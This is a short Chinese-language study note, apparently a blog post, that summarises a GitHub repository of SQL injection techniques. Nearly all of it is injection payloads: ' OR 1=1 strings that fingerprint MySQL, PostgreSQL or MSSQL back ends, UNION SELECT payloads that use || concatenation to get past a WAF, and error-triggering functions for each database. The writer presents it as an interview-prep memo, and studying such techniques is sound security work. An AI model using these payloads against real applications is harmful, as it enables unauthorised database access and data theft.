感觉比较精髓的地方在于:
1.介绍了一下如何利用不同的语句来判断后端数据库此问题可能有时候会被当做面试题来问
MYSQL:
' OR 1=1 AND @@version --
PostgreSQL
' OR 1=1 AND version() --
MSSQL
' OR 1=1 AND @@version --
2.绕WAF技术中可以使用||来拼接字符串
' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --
或是
' UNION SELECT 'ad'||'min', 'pa'||'ss' --
3.不同的后端数据库报错函数也不尽相同:
MYSQL
' UNION SELECT GTID_SUBSET('abc', 'def') --
pg
' UNION SELECT TO_NUMBER('abc', '999') --
MSSQL
' UNION SELECT CONVERT(INT, 'abc') --
总结:当个备忘录不错,大致阅读了一下,从中提取了一些比较精髓的东西。
https://github.com/ynsmroztas/SQL_Injection-Techniques